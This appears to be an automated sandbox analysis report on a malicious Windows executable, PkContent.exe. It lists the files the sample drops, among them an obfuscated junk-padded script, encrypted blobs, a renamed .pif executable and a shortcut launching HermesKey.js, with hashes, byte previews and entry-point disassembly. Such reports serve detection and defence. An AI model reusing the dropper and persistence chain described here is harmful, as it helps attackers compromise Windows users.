                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                              • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):260336
                                              Entropy (8bit):7.999311838752394
                                              Encrypted:true
                                              SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                              MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                              SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                              SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                              SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                              Malicious:false
                                              Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):893608
                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                              • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                              • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):260336
                                              Entropy (8bit):7.999311838752394
                                              Encrypted:true
                                              SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                              MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                              SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                              SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                              SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                              Malicious:false
                                              Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):92160
                                              Entropy (8bit):7.997684559122398
                                              Encrypted:true
                                              SSDEEP:1536:IwEPVIU3le9KUpCuF/Rw7B1Ph87++NdnOpL1+2TZMzDfbCjkqmqISfnKu4+Q1P:IwE9/e91xO7fh8akkL1WPCjRmq5vv4+Q
                                              MD5:975BFC19287C2C5B74A1B228F30F14B0
                                              SHA1:8F5FEEC00B337529A7E193F452C45F6063AD37A1
                                              SHA-256:91E28EFACE5E10865887B9A13420B1BFD3A8673255785E3BFC65745DA63D1322
                                              SHA-512:18D8C41EBCBA5667CB3AC3FA1270D78CAD2FD9E8FC69DD32969B693FEDC6354E3DE12F74830E68B55C6AA7C5A0FBB388599F827CB94D71732231F4EBBF580F85
                                              Malicious:false
                                              Preview:D.7y;..|F..:#>_t.^. S....m....9.]OD...!.....U..wG...}..nk:.?..5..>...=....o.....7....J.....y.S&.....!.m... ..*...<Y.L|..5........7R......?...s..x..........e{'..lF....h.&...r..m.Sq.........Hp&/...........;uz...p..MH....#*..{1.g....".J0...KO....(.......G.yh......|.......O...H.w.~./E.H..w.EL.........Z>....N.z.......4.D=.7.]LCvU.dr...._.f...f...7JR.0.s.. ..k.:R.9....|...vQ2..:....).).z..&......?..w.W.:..)~..<=6.Z+v.[............!.....e0.<..Z..+\.g..D.,......../.].L1`.E..7...-.2..K.m..% VE...9^.c....t....t..-z-.8ZGxpc>.n.z.^,.....Pd..9M..g(..6..........S..`|..w.....J..5....ODJ.PM.jw....F..y.(^...Q.c..............v.....Y.C)....wBj5<..H...~*[:...p........B[.|h..+}.N.I@..>V....<.NB..K.A.....y..(^.%..,.$.....{.c.......T..s....I..^Co+?...."...@.,..T.W.L*@G.6ZT....Kg."...ba...`...qTQ...n......L.%di. .;[B.*hfrdB.....{.Z...w..g.1R-.D8J....0.>.v.1-.ha...6]..'.....Ep.M...q.t..up.....3q/B.7.Yh_....+&..Q.K..w..&)&..9|.h........vq.FC.`.1.p(t.K...D..!...5.
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):7.99698463424558
                                              Encrypted:true
                                              SSDEEP:1536:c4/at9N5gQq5rFSWa39Mp9cBESBESKI2Eux:c4K9NOQq5rpa3ipmBESmSL2Eux
                                              MD5:01D7374BF51507454392D1081D9B309E
                                              SHA1:034378159B5F4B6089A95064AEC9FF210DA7C3DF
                                              SHA-256:EECDD8DFD2DD6D9D1C55077EE6515A9C59D3046112D014B7A5E87FDABB8157A2
                                              SHA-512:DE64B35BFD2C279A77D552F7C518421BFFCF2F5D14E78FA3F80E21B97AEB5DC287340452D61CA19C9AA5CE426C61EC6605786727D844282AA5457A1D8C4F94F4
                                              Malicious:false
                                              Preview:]6. I..B.PtP....R.N~..]w}=#..h.b.>JN).....SOxVqn..^......T...m.Nb..P..Kpy...&.........Vd.<2G.....H3.?e...-.iEh.L..#..T4Y.<.s....:.EMr....7.U..G.e.....[.(.Q...~....=7`....Y[E.,V..m.....r..+.....1..(u<.....2.+$Sf.y.S...X.".8N?.Y...[.1.$.!....2..R.........E..r....G./....54.....2./.....V..-....$'.X.i..+{Rd..."{.Ci..:...../&....G.Xjyl_WW.v;...=.h.......K,......o..O .E?b|D...[.a6D...]....+._H./......u...S.tX...OX.{.|K....4y..%j7G.P....`.Z.....<%v..:.Z.+[...3f.n.d8g..~^.$..Y.d.E....t4..nq..m...:......$>N../.t(.4q%./|..<.>~....)..q.,ol%<!...@..K..w.*Jw.[..S.H....<KE.Wq.Z..}.G.YH..B3.&q..lU.Rg.4....= .u..pu.....7.G.........r.H.J<Y...4...@.D../....l%.}5X..._..m.|G.z..`..b6..=B4\.C.3prRs#m...uGoPN.`r.E.H....h..*h.).k.....T.@A..g..[.......VS...rf..i.B.1kF.b.G/....`V~.,B.$....p...*...I.~..`.'C..H.....'f..VW;..8k.?....... .W.;.(......}..L'....5#.._Z.h.5.E.:..LX..w.`E>^`f.Y.4.N4.~..J......{..<1.&.0.w ."...:..L.)....;j.R..i....d%....o.nH....udo....S.O.
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17659
                                              Entropy (8bit):4.996564903453331
                                              Encrypted:false
                                              SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                              MD5:F15A876FE95AF76D09E4F26593B4502E
                                              SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                              SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                              SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                              Malicious:false
                                              Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17659
                                              Entropy (8bit):4.996564903453331
                                              Encrypted:false
                                              SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                              MD5:F15A876FE95AF76D09E4F26593B4502E
                                              SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                              SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                              SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                              Malicious:false
                                              Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):886191
                                              Entropy (8bit):6.62214375347849
                                              Encrypted:false
                                              SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                              MD5:260377B64080B872FFD57234FF7D097E
                                              SHA1:F9EA953F328A1EC1CAC31AC05A6353AE27519238
                                              SHA-256:29826DE3343C0A6F753F3CDCC551E755E12059E79B0658BE1048E5F893E1C0D3
                                              SHA-512:A01A781D352AC7CB98FD17F91DB6114147188519819106D27A183F8BC114713DE8D0E78524DCAB8833187E365F2207DA5E4CD77FC8D787F63B48A04BF17B6DE5
                                              Malicious:false
                                              Preview:L.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):10480
                                              Entropy (8bit):7.983798029647035
                                              Encrypted:false
                                              SSDEEP:192:jynff145sxYlJ7FDcxxHHivPT+sefSn+zStbLkJdljKQQkVww:j+Hk7Fiel+zqyl+xkh
                                              MD5:B5A2CE2534752D3A6033F59C8436D7B6
                                              SHA1:8E184055AF6E0F7DCD83D832BD565E784A7B8E80
                                              SHA-256:C142EBC3005012C982B366C6E4B03DB5B477C721EED245592A6F2C585EC314C3
                                              SHA-512:C2F5480E23FCD32AC7111FC9E507B7660EE551477A1DC18F188BD5796BF29BC93CC10926908F9F6483E906BFC07DDE07BE7223BC0B4B4C5DBC0FA1C0F2D43F2C
                                              Malicious:false
                                              Preview:.Lc}.....B.....G?.H...,.~o...3..9.C.Y_.....Z.7...X....i.....42...r/e...L..........M.{......?B.ZwF.U...2).:.~)=?...p.`B~.i...@.l.V......3.15..e.x%_.G.-.........."...0.Q...........I.f.......\%(.o..z?...W......(Zl..y.../.}P.s...K.....O.vT:.(Lk.W.....N...........h....V...cz@@.....^._...C.[.Tz...<...+C+.....H..-...A..n....=CM6T..]..5w+L.......c..v}..Ys..t.7F..l_.0..{D..W....`....2f)|...$N..n.D....`s...7...O-$.rc?...T+..C..=....L..\.`......oN....(..K..S=.m.....e.6..l..2..H.........6d....$r...z [Z..z...I.[SP[dg....LVN.8.sd.>....]...[,.MS.(..~.#..u6..M...e?...i.H.{.o....Tq..T?...?>.....<.84.;....B1..Q.9.....BcT.@Lr.7{.....=&..j..V.B..<JVu.s.l:.....wzXM..H>n......... 8.d6..;...^.6..E[.|.NG.AT.6...Z....s..t]w.i....q.Q...$".~q;+..*....p|Xx3...(.....F.EB.....6.Tv.,..3,.L*|..1_.V.Y....a.k.b..1.z.?fQw...kM.v......Z.x.1.7(.Ot...........B....'.cm....I....".. ~.....AS_.....5-.nwSu.z.0zY.?.~[.......{....o).*3..l.D..f...A{[.QB........ .+......-....@...W.c...
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):7439
                                              Entropy (8bit):6.20867102662523
                                              Encrypted:false
                                              SSDEEP:192:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3j:3HAHhww+/2nlP3r1WAL3j
                                              MD5:4192BA712A2FDC09914B07D144F06E20
                                              SHA1:0A3320EEA12B490FD589B9F2CB878579108BE555
                                              SHA-256:265661FDDDD79AEFCFBA0FC456CF864C05439B8281DA8345D200283F5664A229
                                              SHA-512:543248B976F061C835329ADBCCBB249922EBEB671BB158D7A0E70284E0FE9D723C18E8A2E4F198202CFA20DC3D0F341EFD4E78C64F4D5E56E8D2A08745417948
                                              Malicious:false
                                              Preview:WowLiberalCalOfficer..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\PkContent.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):98304
                                              Entropy (8bit):7.997882479856261
                                              Encrypted:true
                                              SSDEEP:1536:jCFS3z3sTLVmA/uMsH3zK6wrNp9FCLFM1pKOnaJt7ggzNVsFBLiHy4QWQ3NSmFPN:p3z3sTLEA/Kj9S/9p1ajcQVs3iH9Q3Nn
                                              MD5:B7C64D91870C30F6D27B86C9294CA361
                                              SHA1:41EA994169F7BEA9752F6BD40D9833D6577EDE49
                                              SHA-256:91A57858547382FA34E5AAD2A6C8546C4EAEAA32B515693E42E84AD190149A6A
                                              SHA-512:D6D3625A28A8AB2AAD5E5E80CB10798D3602E0E189D521E4FECBEE4F4015F07E7D2C6F9CDBEC4C9EFCC5C903C3EBAAF9B6ABBF30D615748316992A5C398BC1B6
                                              Malicious:false
                                              Preview:..O...`...*..L3".....V....0.........B._.........(....98T9......i....Z...\v.........7.nJ.`..m.).O@0."..U...HH..6Mj........#'..?..t....u...QF&+....'....^.!hK..k.h......._H.#E-..&IF3..0`...3>..+i.[.........#...W..lj.c..P..GD.....o....m..Ozt..i.U..P.[.j......q..HR.:.,...c..|....%..#..=..wd..3..;.......5....>T.....%.mk$.w..+7..u.::.9....q..P..qA..Q(.]......d.5K..k..0.*......zy....C...rO.3...W..Hg.@Tc...f..b.T...8\.EA.C..<V.[.Z./.\..8..i...._..X..6.......q.\.1{7'...~v.R.'.....=^.Tc}c.q.........`.8...%...\.D|.o....Fibpo......L..>.{....E.e....B....V...~cj..t...<@..+..[vP.V...*.h.NzJI..1.L..O.\."....-hP.......M.......E...W...p... ....;%'w@....K..B. v..m...x.1.....\5...Y/.O.l.....*,.C.<.G..U]....%...ba.^..N:....s...dH|..Y-..k/P......jh..}...Z.kA.IM *<O..j-..i....T.X...*..K.bS.&....."..$D.}.&q|.NIo.:.z.y.w...J.....b....3..."M..@.....#.......6.Tc.q..`..r....`..k3.6o.k...o.....z.d...r.o..=Q...f$..~...|w.Y;...s.....1.N.CA.......5Tgt....x3
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):93
                                              Entropy (8bit):4.924866914662243
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5iQRAcCIPcp:HRYF5yjo923iQRAcPS
                                              MD5:01E010484AAD4239F5FD79A5AEE232DD
                                              SHA1:6776ED4C99E9E3340752BFEEBAE89AF580163159
                                              SHA-256:EF91C467627F435A6A51A1949BC84EE8C4D263F5BA01677E56AE2B7F29889436
                                              SHA-512:36475BDB8AA994289D6A4D497547E6F250AB8F87D2C8E424CA0E66FAD6F85118023D874A11387BA00C5011EC65DED48EB52185D2C869D3B7DF8A346388F98B79
                                              Malicious:true
                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" ..
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.3246704923656605
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:PkContent.exe
                                              File size:830'415 bytes
                                              MD5:87c051a77edc0cc77a4d791ef72367d1
                                              SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
                                              SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
                                              SHA512:259a3f823d5051fcc9e87ceacf25557ab17f5d26ff4f0c17801d9ef83a23d2a51261a73e5ba9c3caf1ca2feb18a569458f17a2a5d56b542b86d6a124a42d4c2c
                                              SSDEEP:12288:FCxMe2dk7YgL+OsQdFGHjaRYf9bquEZ68ufU3wqB2ydPsW/w0bvf:FsMe2KYIDpSO5vZ68FwqB2aPsW3
                                              TLSH:A80523030FEDC667D1E10EB2183381698AB2F89F05B1E66B43A08F1F3175E459A5A35F
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                              Icon Hash:0103010303030303
                                              Entrypoint:0x403883
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+18h], ebp
                                              mov dword ptr [esp+10h], 00409268h
                                              mov dword ptr [esp+14h], ebp
                                              call dword ptr [00408030h]
                                              push 00008001h
                                              call dword ptr [004080B4h]
                                              push ebp
                                              call dword ptr [004082C0h]
                                              push 00000008h
                                              mov dword ptr [00472EB8h], eax
                                              call 00007F8868E7CB9Bh
                                              push ebp
                                              push 000002B4h
                                              mov dword ptr [00472DD0h], eax
                                              lea eax, dword ptr [esp+38h]
                                              push eax
                                              push ebp
                                              push 00409264h
                                              call dword ptr [00408184h]
                                              push 0040924Ch
                                              push 0046ADC0h
                                              call 00007F8868E7C87Dh
                                              call dword ptr [004080B0h]
                                              push eax
                                              mov edi, 004C30A0h
                                              push edi
                                              call 00007F8868E7C86Bh
                                              push ebp
                                              call dword ptr [00408134h]
                                              cmp word ptr [004C30A0h], 0022h
                                              mov dword ptr [00472DD8h], eax
                                              mov eax, edi
                                              jne 00007F8868E7A16Ah
                                              push 00000022h
                                              pop esi
                                              mov eax, 004C30A2h
                                              push esi
                                              push eax
                                              call 00007F8868E7C541h
                                              push eax
                                              call dword ptr [00408260h]
                                              mov esi, eax
                                              mov dword ptr [esp+1Ch], esi
                                              jmp 00007F8868E7A1F3h
                                              push 00000020h
                                              pop ebx
                                              cmp ax, bx
                                              jne 00007F8868E7A16Ah
                                              add esi, 02h
                                              cmp word ptr [esi], bx
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ C ] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x1e898.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
